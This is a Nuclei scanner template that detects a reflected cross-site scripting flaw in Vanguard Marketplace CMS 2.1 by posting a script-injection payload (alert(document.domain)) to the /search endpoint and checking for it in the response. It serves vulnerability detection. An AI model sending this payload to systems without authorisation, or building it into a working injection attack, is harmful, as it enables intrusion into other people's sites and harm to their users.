nuclei-templates/vulnerabilities/other/vanguard-post-xss.yaml

42 lines
1.1 KiB
YAML

id: vanguard-post-xss
info:
name: Vanguard Marketplace CMS 2.1 - Cross-Site Scripting
author: ImNightmaree
severity: high
description: Vanguard Marketplace CMS 2.1 contains a cross-site scripting vulnerability in the message and product title tags and in the product search box.
reference:
- https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: vanguard,xss,packetstorm
requests:
- raw:
- |
POST /search HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/23